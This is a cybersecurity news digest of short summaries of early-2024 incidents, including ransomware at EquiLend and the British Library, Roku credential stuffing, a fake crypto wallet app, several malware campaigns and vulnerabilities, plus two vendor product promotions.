Daily Brief

New York-based EquiLend Holdings suffered a ransomware attack in January, leading to the theft of employee data. The financial technology firm initially took systems offline on January 22 to contain a breach and confirmed the incident resulted from ransomware. Although client services resumed, and there is no evidence of client data exfiltration, employee personally identifiable information (PII) was stolen. Stolen PII includes names, birth dates, and Social Security numbers of EquiLend employees. LockBit ransomware group claimed responsibility, but EquiLend has not confirmed the attackers' identity. Affected employees are being offered two years of free identity theft protection services through IDX. EquiLend, founded by major banks and broker-dealers, serves over 190 firms globally and facilitates transactions worth over $2.4 trillion monthly.

Roku has confirmed a data breach affecting 15,363 customers, with accounts being used for unauthorized purchases. Stolen accounts were sold for $0.50 apiece, enabling buyers to use the victims' stored payment information. The breach was due to credential stuffing attacks using details from other breaches to access Roku accounts. Once inside an account, attackers could alter passwords, email, and shipping addresses, blocking out the legitimate user. Roku responded by securing the breached accounts, forcing password resets, and initiating refunds for unauthorized transactions. Roku has faced criticism for new "Dispute Resolution Terms" that may be connected to the credential stuffing attacks and the resultant fraudulent activities. At present, Roku does not support two-factor authentication, potentially leaving accounts more vulnerable to such attacks.

A counterfeit Leather cryptocurrency wallet app on Apple's App Store has been reported as a "wallet drainer," stealing users' digital assets. The authentic Leather wallet platform has warned its community and advised that any user who entered their passphrase into the fake app should immediately transfer their assets to a secure wallet. Despite Leather's warnings and a report to Apple, the malicious app, published by 'LetalComRu,' remains available for download and sports a suspiciously high user rating. Victims have already reported losses, indicating that the fake app is actively draining cryptocurrency from those who have installed it. This incident echoes previous occurrences on the App Store, highlighting that even with Apple's strict security measures, scammers are managing to bypass checks. Experts recommend accessing any digital wallet app via official links from verified websites, using the real Leather website as an example at leather.io.

A new banking trojan named CHAVECLOAK is targeting Brazilian users, disseminated through phishing emails with PDF attachments. The emails utilize contract-themed DocuSign lures, prompting users to click a button which downloads malware from a remote link. CHAVECLOAK uses DLL side-loading with an executable "Lightshot.exe" to infect systems, specifically aiming at Brazilian financial institutions. The trojan can block screens, log keystrokes, and use deceptive pop-ups to steal credentials, with a focus on banks and cryptocurrency platforms like Mercado Bitcoin. A Delphi variant of the malware has been identified, continuing the trend of Delphi-based malware in Latin America. This threat emphasizes the evolving cyberthreat landscape in the financial sector and parallels other phishing campaigns, like the mobile banking fraud campaign deploying Copybara malware in Europe. Advanced evasion techniques, geofencing, and real-time remote interaction with infected devices demonstrate the growing sophistication of on-device fraud (ODF) schemes.

One Identity PAM Essentials is a cloud-based Privileged Access Management solution designed to enhance security and manageability while ensuring compliance in cloud environments. The solution focuses on a user-centric and security-first design, simplifying privileged sessions and access controls, thus reducing the risk of unauthorized access and potential data breaches. PAM Essentials streamlines traditional PAM approaches by eliminating complexities and the need for additional infrastructure, leading to reduced operational costs and improved visibility into privileged activities. Its compliance features help organizations adhere to regulations, meet industry-specific standards, and satisfy cyber insurance requirements, all while being cost-effective. With cloud-native architecture, PAM Essentials supports scalability, flexibility, and remote access, ensuring seamless integration with existing cloud services for adaptive identity management. Native integration with OneLogin's access management solutions amplifies the capabilities of PAM Essentials, providing a holistic and seamless privileged access management experience. PAM Essentials is positioning itself to redefine the PAM market by offering a comprehensive cloud-native tool that addresses modern cybersecurity challenges and the evolving digital landscape.

The British Library is struggling to recover from a ransomware attack by Rhysida that damaged servers and stole 600GB of data, attributing issues to legacy IT systems. Ageing technology cannot be restored on new infrastructure and lacks vendor support, with a report underscoring the complex network that allowed extensive Rhysida infiltration. Legacy systems relied on insecure, manual data processes, increasing the volume of vulnerable staff and customer data on the network. The library cites fiscal constraints imposed by legal regulations that diverted funds from IT modernization to mandatory archiving services as a contributing factor to the outdated IT estate. Disruption from the ransomware attack continues to affect library services including online access, on-site WiFi, and access to physical collections; electronic resources and some research services remain offline. The British Library plans to shift toward cloud-based technologies within the next 18 months, having identified them as easier to manage despite new security risks. There is now a rush to strengthen cybersecurity capacity, but challenges include team size, adequate funding, and competitive remuneration for IT talent. Financial reallocation will expedite the IT overhaul with interim solutions being implemented, and a major upgrade phase set for the next 18 months; this adjustment comes after a budget originally spread over seven years.

Traditional Data Leakage Prevention (DLP) solutions, accustomed to on-premises IT infrastructure, now require adaptation to better secure data within cloud-based environments. The effectiveness of on-premise DLPs diminishes as corporate data increasingly resides online, necessitating a shift in data protection strategies. A new guide by LayerX, "On-Prem is Dead. Have You Adjusted Your Web DLP Plan?", outlines this transition and offers solutions for evolving DLP approaches. The guide suggests three possible data protection paths: maintaining the status quo with traditional DLPs, adopting Cloud Access Security Broker (CASB) DLP for SaaS app monitoring, or implementing Browser DLP for comprehensive monitoring and policy enforcement. Browser DLP is recommended as the most effective solution, using enterprise browser extensions to monitor user activity and website execution directly. Examples of browser DLP policies, tailored to safeguard data in cloud environments, showcase practical measures that can be taken to prevent unauthorized data exposure and cyber threats. IT and security professionals are encouraged to read the guide to better understand and implement updated DLP solutions suitable for the current cloud-centric landscape.

The UK Information Commissioner's Office (ICO) is conducting a consultation on "consent or pay" models, which offer users a choice between paying for services or consenting to their data being used for advertising. The ICO has not specifically named any companies, but Meta's approach in the EU, which involves a choice between paying for ad-free services or allowing data processing for ads, is a well-known example. Privacy advocates have criticized these models, and there have been several lawsuits based on EU data protection laws, questioning their legality and the nature of consent. The ICO emphasizes the importance of clear consent and the ease of withdrawing consent, in line with UK GDPR rules, which remain closely aligned with EU GDPR post-Brexit. There are four key considerations highlighted by the ICO, including how fees should be calculated, the equivalence of ad-funded and paid services, the balance of power between service providers and users, and the user's understanding of data usage. "Consent or pay" models are not prohibited by data protection law, but the ICO is carefully assessing the complexity of consent within these models to ensure they comply with legal standards. Stakeholders can submit their opinions to the ICO until April 17, 2024, as part of this open consultation process.

The BianLian ransomware group is exploiting vulnerabilities in JetBrains TeamCity to carry out extortion attacks. Security analysis disclosed that the recent compromise involved a TeamCity server exploitation, resulting in a Go backdoor deployment. After a decryptor for BianLian was made available in January 2023, the group shifted focus to exclusively conduct exfiltration-based extortion. Attackers gain initial access by exploiting CVEs in TeamCity, subsequently creating new users and executing commands for lateral movement. BianLian's tailored Go backdoor, known as BianDoor by Microsoft, failed, leading attackers to use an equivalent PowerShell backdoor. The GitHub PowerShell backdoor establishes a TCP socket to allow remote attackers to perform actions on compromised hosts. Separately, critical vulnerabilities in Atlassian Confluence (CVE-2023-22527) have led to the deployment of C3RB3R ransomware, cryptocurrency miners, and RATs. The vulnerability exploitation indicates a trend of active exploitation by threat actors in the wild, highlighting the importance of vigilance and rapid response.

A high-risk vulnerability in Progress Software's OpenEdge Authentication Gateway and AdminServer could allow bypassing of authentication mechanisms. Identified as CVE-2024-1403, the flaw has received the maximum severity score of 10.0 according to the CVSS rating system. The security issue affects various versions of OpenEdge and stems from improper handling of unexpected username and password types. Updates to OpenEdge that rectify the issue have been released: versions 11.7.19, 12.2.14, and 12.8.1. Security firm Horizon3.ai has published a proof-of-concept exploit after reverse-engineering the affected AdminServer service. The PoC indicates that specially crafted usernames can trigger an incorrect authentication success, potentially leading to unauthorized system access. Further potential threats include the ability to deploy new applications remotely via WAR files, though this attack vector presents increased complexity.

Magnet Goblin, a financial-motivated hacker group, is exploiting one-day vulnerabilities in edge devices and public-facing services. The group has been active since at least January 2022, quickly leveraging new vulnerabilities to infiltrate systems and deploy malware. Compromised devices include Ivanti Connect Secure VPN, Magento, Qlik Sense, and potentially Apache ActiveMQ servers. Upon successful exploitation, Magnet Goblin deploys a cross-platform RAT named Nerbian RAT, and its variant MiniNerbian for command execution and data exfiltration. Nerbian RAT and MiniNerbian have largely avoided detection by operating on edge devices, which are often less protected. The group also utilizes other tools such as WARPWIRE JavaScript credential stealer, Ligolo tunneling software, and legitimate remote desktop software like AnyDesk and ScreenConnect. This trend underlines the importance of securing all potential entry points, including those previously considered low-risk.

Microsoft took six months to patch a Windows vulnerability actively exploited by North Korea's Lazarus Group. The vulnerability, located in the input/output control dispatcher of appid.sys, allowed admin-to-kernel exploitation. Avast cybersecurity researchers notified Microsoft of the exploit in August but the fix wasn't issued until February's Patch Tuesday. Microsoft has been criticized for not prioritizing the vulnerability and for failing to disclose its active exploitation when the patch was released. Critical vulnerabilities were also reported in Apple's iOS, with updates released for several including some under active exploitation. The NSA and CISA released cloud security mitigation tips, highlighting the importance of proper cloud computing security practices. A new initiative by the White House and open-source organizations aims to offer Infosec training and certifications to 250 Jordanian women, enhancing cybersecurity workforce diversity.

Hackers have exploited a vulnerability in the Popup Builder plugin for WordPress, infecting more than 3,300 websites with malware. The exploited flaw, CVE-2023-6000, is a cross-site scripting (XSS) vulnerability affecting versions 4.2.3 and earlier of the plugin, initially reported in November 2023. Despite a previous Balada Injector campaign targeting the same vulnerability to infect approximately 6,700 websites, many admins have still not applied the available patches. The recent spate of attacks inserts malicious code into the Custom JavaScript or Custom CSS sections within the WordPress admin interface, using the 'wp_postmeta' table in the database. The code acts as event handlers for the plugin's functionality, triggering on popup events, primarily redirecting visitors to malicious websites, including phishing and malware-dropping sites. Sucuri recommends blocking domains associated with the attack and updating the Popup Builder plugin to the latest version, which patches the security vulnerabilities. With at least 80,000 active sites still using vulnerable versions of the Popup Builder plugin, the potential for further exploitation remains high. Removal of the infection requires deleting malicious entries and scanning for potential backdoors.

A cybercriminal group named Magnet Goblin targets public servers using 1-day vulnerabilities to install custom malware. These hackers quickly exploit flaws, sometimes just a day after proof-of-concept exploits are published. Vulnerable services include Ivanti Connect Secure, Apache ActiveMQ, ConnectWise ScreenConnect, Qlik Sense, and Magento. They deploy NerbianRAT and MiniNerbian malware variants and a custom JavaScript stealer on both Windows and Linux systems. Check Point analysts reveal the Linux variant of NerbianRAT has been active since May 2022, collecting system information and establishing communication with C2 servers. Magnet Goblin's activities are difficult to isolate due to the volume of 1-day exploitation data following vulnerability disclosures. Quick patching, network segmentation, endpoint protection, and multi-factor authentication are essential to mitigate the risk of similar exploits.

Russian state-backed hackers, known as Midnight Blizzard, breached Microsoft's internal systems, accessing source code and potentially proprietary customer information. The intrusion was detected in January 2024 but occurred in November 2023 through a password spray attack on a test account lacking multi-factor authentication. Microsoft reported no evidence of customer-facing systems being compromised but has been contacting directly affected customers. The hacking group increased its password spray attacks significantly in February, following a large volume of such attacks in January. Microsoft is escalating its security measures and investments in response to the sophisticated and persistent nature of Midnight Blizzard's operations. The threat actor is also known as APT29 or Cozy Bear and is associated with Russia's Foreign Intelligence Service (SVR), notorious for high-profile breaches including the SolarWinds hack. The ongoing investigation aims to understand the full scope of the breach and prevent future unauthorized access leveraging stolen information.